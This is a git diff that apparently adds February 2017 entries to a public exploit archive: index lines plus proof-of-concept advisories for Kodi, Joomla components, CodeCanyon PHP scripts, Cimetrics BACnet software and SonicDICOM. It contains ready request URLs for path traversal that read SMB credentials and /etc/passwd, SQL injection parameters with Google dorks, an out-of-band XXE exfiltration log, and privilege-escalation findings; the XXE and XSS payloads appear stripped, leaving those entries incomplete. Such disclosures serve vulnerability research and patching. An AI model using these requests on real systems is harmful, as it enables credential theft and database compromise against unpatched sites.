diff --git a/files.csv b/files.csv
index 317ce272d..9c65467dd 100644
--- a/files.csv
+++ b/files.csv
@@ -8790,6 +8790,8 @@ id,file,description,date,author,platform,type,port
41221,platforms/windows/local/41221.txt,"Ghostscript 9.20 - 'Filename' Command Execution",2017-02-02,hyp3rlinx,windows,local,0
41240,platforms/linux/local/41240.sh,"ntfs-3g (Debian 9) - Privilege Escalation",2017-02-03,"Kristian Erik Hermansen",linux,local,0
41265,platforms/windows/local/41265.py,"IVPN Client 2.6.1 - Privilege Escalation",2017-02-06,"Kacper Szurek",windows,local,0
+41320,platforms/windows/local/41320.txt,"Cimetrics BACstac 6.2f - Privilege Escalation",2017-02-12,LiquidWorm,windows,local,0
+41321,platforms/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37228,3 +37230,20 @@ id,file,description,date,author,platform,type,port
41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41308,platforms/php/webapps/41308.txt,"WordPress 4.7.0/4.7.1 Plugin Insert PHP - PHP Code Injection",2017-02-09,CrashBandicot,php,webapps,0
+41309,platforms/windows/webapps/41309.html,"SonicDICOM PACS 2.3.2 - Cross-Site Scripting",2017-02-11,LiquidWorm,windows,webapps,0
+41310,platforms/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,windows,webapps,0
+41311,platforms/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,windows,webapps,0
+41312,platforms/linux/webapps/41312.txt,"Kodi 17.1 - Arbitrary File Disclosure",2017-02-12,"Eric Flokstra",linux,webapps,0
+41313,platforms/php/webapps/41313.txt,"WhizBiz 1.9 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41314,platforms/php/webapps/41314.txt,"TI Online Examination System 2.0 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41315,platforms/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41316,platforms/php/webapps/41316.txt,"Viavi Movie Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41317,platforms/php/webapps/41317.txt,"Viavi Product Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41318,platforms/php/webapps/41318.txt,"Quadz School Management System 3.1 - 'uisd' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41319,platforms/php/webapps/41319.txt,"Domains & Hostings Manager PRO 3.0 - 'entries' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41322,platforms/php/webapps/41322.txt,"Joomla! Component onisPetitions 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41323,platforms/php/webapps/41323.txt,"Joomla! Component onisQuotes 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41324,platforms/php/webapps/41324.txt,"Joomla! Component onisMusic 2 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41325,platforms/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41326,platforms/php/webapps/41326.txt,"Joomla! Component Vik Booking 1.7 - SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41327,platforms/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
diff --git a/platforms/linux/webapps/41312.txt b/platforms/linux/webapps/41312.txt
new file mode 100755
index 000000000..5ab02362f
--- /dev/null
+++ b/platforms/linux/webapps/41312.txt
@@ -0,0 +1,54 @@
+# Exploit Title: Kodi - Local File Inclusion
+# Date: 12 February 2017
+# Exploit Author: Eric Flokstra
+# Vendor Homepage: https://kodi.tv/
+# Software Link: https://kodi.tv/download/
+# Version: Kodi version 17.1 (Krypton), Chorus version 2.4.2
+# Tested on: Linux
+
+Kodi (formerly XBMC) is a free and open-source media player software
+application developed by the XBMC Foundation. Chorus is a web interface
+for controlling and interacting with Kodi. It is hosted by the Kodi
+installation.
+
+The web interface loads a thumbnail of an image, video or add-on when
+selecting a category in the left menu with the following request:
+
+http://192.168.1.25:8080/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F
+
+Insufficient validation of user input is performed on this URL resulting
+in a local file inclusion vulnerability. This enables attackers
+to retrieve arbitrary files from the filesystem by changing the location
+after the '/image/image%3A%2F%2F’ part.
+
+<--Examples-->
+
+1) If Kodi is connected to a NAS the following request can be used to obtain plain text SMB credentials:
+
+http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml
+
+Response:
+
+smb://192.168.1.15/smb://username:password@192.168.1.15//share
+
+2) Request to retrieve the content of /etc/passwd:
+
+http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
+
+Response:
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+...
\ No newline at end of file
diff --git a/platforms/php/webapps/41313.txt b/platforms/php/webapps/41313.txt
new file mode 100755
index 000000000..59699e9d4
--- /dev/null
+++ b/platforms/php/webapps/41313.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: WhizBiz - Business Directory CMS v1.9 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://webhelios.com/
+# Software Buy: https://codecanyon.net/item/whizbiz-business-directory-cms/12931569
+# Demo: http://whizbiz.webhelios.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/en/results/plainkey=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41314.txt b/platforms/php/webapps/41314.txt
new file mode 100755
index 000000000..c991be789
--- /dev/null
+++ b/platforms/php/webapps/41314.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: TI Online Examination System v2.0 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://textusintentio.com/
+# Software Buy: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
+# Demo: http://oesv2.textusintentio.com/
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as student user
+# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
+# http://localhost/[PATH]/center/student_edit.php?s_id=[SQL]
+# http://localhost/[PATH]/center/edit_notice.php?n_id=[SQL]
+# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41315.txt b/platforms/php/webapps/41315.txt
new file mode 100755
index 000000000..ce5824ed9
--- /dev/null
+++ b/platforms/php/webapps/41315.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Viavi Real Estate - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://viavilab.com/
+# Software Buy: https://codecanyon.net/item/viavi-real-estate/11217313
+# Demo: http://viavilab.com/codecanyon/real_estate_demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/property-detail.php?pid=[SQL]
+# http://localhost/[PATH]/buysalerent.php?sort=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41316.txt b/platforms/php/webapps/41316.txt
new file mode 100755
index 000000000..4086d7c38
--- /dev/null
+++ b/platforms/php/webapps/41316.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Viavi Movie Review - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://viavilab.com/
+# Software Buy: https://codecanyon.net/item/movie-review/12729570
+# Demo: http://viavilab.com/codecanyon/movie_review_demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/genres.php?id=[SQL]
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/41317.txt b/platforms/php/webapps/41317.txt
new file mode 100755
index 000000000..5a7a47b4e
--- /dev/null
+++ b/platforms/php/webapps/41317.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Viavi Product Review - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://viavilab.com/
+# Software Buy: https://codecanyon.net/item/product-review/12406163
+# Demo: http://viavilab.com/codecanyon/product_review_demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/category.php?id=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41318.txt b/platforms/php/webapps/41318.txt
new file mode 100755
index 000000000..4cd42b55b
--- /dev/null
+++ b/platforms/php/webapps/41318.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Quadz School Management System v3.1 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://awardcorporation.com/
+# Software Buy: https://codecanyon.net/item/quadz-school-management-system/10452009
+# Demo: http://mass.awardcorporation.com/
+# Version: 3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as student user
+# http://localhost/[PATH]/index.php/sclass/ownClassRoutin?uisd=[SQL]
+# http://localhost/[PATH]/index.php/suggestion/own_suggestion?uisd=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41319.txt b/platforms/php/webapps/41319.txt
new file mode 100755
index 000000000..98134ebca
--- /dev/null
+++ b/platforms/php/webapps/41319.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Domains & Hostings Manager PRO v 3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://endavi.com/
+# Software Buy: https://codecanyon.net/item/advanced-domains-and-hostings-pro-v3-multiuser/10368735
+# Demo: http://endavi.com/dhrpro_demo/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/list.php?entries=[SQL]
+# http://localhost/[PATH]/edit.php?entries=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41322.txt b/platforms/php/webapps/41322.txt
new file mode 100755
index 000000000..48cd5e13d
--- /dev/null
+++ b/platforms/php/webapps/41322.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Joomla Component onisPetitions 2.5 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onispetitions/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Tested on: Linux
+
+# POC :
+# tag Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_onispetitions&view=petitions&tag=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/php/webapps/41323.txt b/platforms/php/webapps/41323.txt
new file mode 100755
index 000000000..fe2ee65ee
--- /dev/null
+++ b/platforms/php/webapps/41323.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Joomla Component onisQuotes 2.5 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/news-display/quotes/onisquotes/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Tested on: Linux
+
+# POC :
+# tag Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_onisquotes&view=quotes&tag=[SQL]&Itemid=180
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/php/webapps/41324.txt b/platforms/php/webapps/41324.txt
new file mode 100755
index 000000000..876d00aa2
--- /dev/null
+++ b/platforms/php/webapps/41324.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component onisMusic 2 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/onismusic/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:option=com_onismusic
+# Tested on: Linux
+
+# POC :
+# tag Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_onismusic&view=songs&tag=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/php/webapps/41325.txt b/platforms/php/webapps/41325.txt
new file mode 100755
index 000000000..72ccc868b
--- /dev/null
+++ b/platforms/php/webapps/41325.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component Sponsor Wall 7.0 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:index.php?oprion=com_sponsorwall
+# Tested on: Linux
+
+# POC :
+# wallid Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_sponsorwall&task=click&wallid=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/php/webapps/41326.txt b/platforms/php/webapps/41326.txt
new file mode 100755
index 000000000..5961c6174
--- /dev/null
+++ b/platforms/php/webapps/41326.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component Vik Booking 1.7 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extension/vik-booking/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:index.php?option=com_vikbooking
+# Tested on: Linux
+
+# POC :
+# room_ids[0] Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_vikbooking&view=availability&room_ids[0]=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/php/webapps/41327.txt b/platforms/php/webapps/41327.txt
new file mode 100755
index 000000000..eb5a70da7
--- /dev/null
+++ b/platforms/php/webapps/41327.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component Soccer Bet 4.1.5 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/sports-a-games/tips-a-betts/soccer-bet/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:index.php?option=com_soccerbet
+# Tested on: Linux
+
+# POC :
+# Cat Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_soccerbet&view=matches&cat=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+
diff --git a/platforms/windows/local/41320.txt b/platforms/windows/local/41320.txt
new file mode 100755
index 000000000..eb426b44e
--- /dev/null
+++ b/platforms/windows/local/41320.txt
@@ -0,0 +1,101 @@
+Cimetrics BACstac Routing Service 6.2f Local Privilege Escalation
+
+
+Vendor: Cimetrics, Inc.
+Product web page: https://www.cimetrics.com
+Affected version: 6.2f
+
+Summary: BACstac belongs to product BACstac(TM) Networking Software and
+was developed by company Cimetrics Inc. Cimetrics is excited to announce
+a new version of our industry-leading BACnet protocol stack: BACstac 6.8.
+The Cimetrics BACstac saves man-years of development when your company needs
+to create a BACnet solution ! Our software team has created a set of BACnet
+libraries which greatly simplify the task of interfacing to BACnet.
+
+Even the largest companies in the HVAC industry use our code because it is
+a very complex and time consuming task keeping up with the ongoing changes
+that are taking place in the BACnet committees. For example, many hundreds
+of protocol modifications, requirements, and enhancements have taken place
+in just the past year. By purchasing the Cimetrics BACstac solution, we do
+the compatibility coding and testing. This typically saves man-years of
+software developer time EVERY YEAR !
+
+Desc: The application suffers from an unquoted search path issue impacting
+the service 'bacstac' (bacstac-gtw.exe) for Windows deployed as part of BACstac
+routing service solution. This could potentially allow an authorized but non-privileged
+local user to execute arbitrary code with elevated privileges on the system.
+A successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user’s code would execute with the elevated privileges
+of the application.
+
+BACstac also provides a named pipe used for IPC connection between a BACstac
+application and the BACstac service.
+
+The BACstac Service implements AL multiplexing using a custom IPC mechanism. The
+IPC mechanism was chosen to allow portability to embedded systems, and it uses a
+fixed number of slots. The slots are recycled when an application stops running.
+
+With Object-based multiplexing, Service requests that identify a particular Object
+(e.g. Read-Property) can be forwarded to a dedicated process. A multiplexing server
+using an appropriate IPC mechanism (e.g. CORBA, COM, or UDP) can be built on top of
+the BACstac API.
+
+A number of BACstac protocol stack run-time configuration parameters are stored
+in the Windows Registry. These values are created and initialized when the protocol
+stack is installed. The registry entries are not completely removed when the protocol
+stack is uninstalled (this is standard behaviour for .INF files). The Registry
+entries are located in:
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Cimetrics\BACstac
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BACstac
+
+The BACstac Service parameters (in ..\Services\BACstac) include plenty of keys,
+one of which is the 'Tsml\ConnIpc' key with the default name: \\.\pipe\bacstac.
+
+The vulnerability exist due to the improper permissions, with the 'F' flag (Full)
+for 'Everyone' group.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+ Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2017-5397
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5397.php
+
+
+13.12.2016
+
+--
+
+
+C:\>sc qc bacstac
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: bacstac
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Cimetrics\BACstac v6.2f\bacstac-gtw.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : BACstac Protocol
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>
+C:\>accesschk.exe \pipe\bacstac
+
+Accesschk v6.02 - Reports effective permissions for securable objects
+Copyright (C) 2006-2016 Mark Russinovich
+Sysinternals - www.sysinternals.com
+
+\\.\Pipe\bacstac
+ RW Everyone
+
+C:\>
diff --git a/platforms/windows/local/41321.txt b/platforms/windows/local/41321.txt
new file mode 100755
index 000000000..f931e0495
--- /dev/null
+++ b/platforms/windows/local/41321.txt
@@ -0,0 +1,55 @@
+Cimetrics BACnet Explorer 4.0 XXE Vulnerability
+
+
+Vendor: Cimetrics, Inc.
+Product web page: https://www.cimetrics.com
+Affected version: 4.0.0.0
+
+Summary: The BACnet Explorer is a BACnet client application that
+helps auto discover BACnet devices.
+
+Desc: BACnetExplorer suffers from an XML External Entity (XXE)
+vulnerability using the DTD parameter entities technique resulting
+in disclosure and retrieval of arbitrary data on the affected node
+via out-of-band (OOB) attack. The vulnerability is triggered when
+input passed to the xml parser is not sanitized while parsing the
+xml project file.
+
+Tested on: Microsoft Windows NT 6.1.7601 Service Pack 1
+ mscorlib.dll: 4.0.30319.34209 built by: FX452RTMGDR
+ BACstac Library: 1.5.6116.0
+ BACstac Service: 6.8.3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2017-5398
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5398.php
+
+
+30.01.2017
+
+--
+
+Open file evil.xml:
+
+
+
+%remote;
+%root;
+%oob;]>
+
+
+xxe.xml on the web server:
+
+
+ ">
+
+
+pyhon -m SimpleHTTPServer 8080
+
+lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1 HTTP/1.1" 301 -
+lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1/ HTTP/1.1" 200 -
diff --git a/platforms/windows/webapps/41309.html b/platforms/windows/webapps/41309.html
new file mode 100755
index 000000000..def772549
--- /dev/null
+++ b/platforms/windows/webapps/41309.html
@@ -0,0 +1,78 @@
+SonicDICOM PACS 2.3.2 Multiple Stored Cross-Site Scripting Vulnerabilities
+
+
+Vendor: JIUN Corporation
+Product web page: https://www.sonicdicom.com
+Affected version: 2.3.2 and 2.3.1
+
+Summary: SonicDICOM is PACS software that combines the capabilities of
+DICOM Server with web browser based DICOM Viewer.
+
+Desc: The application suffers from multiple stored XSS vulnerabilities.
+Input passed to several API POST parameters is not properly sanitised
+before being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in context
+of an affected site.
+
+Tested on: Microsoft-HTTPAPI/2.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2017-5394
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5394.php
+
+22.11.2016
+
+--
+
+
+CSRF Stored XSS via value parameter in settings API:
+----------------------------------------------------
+
+
+
+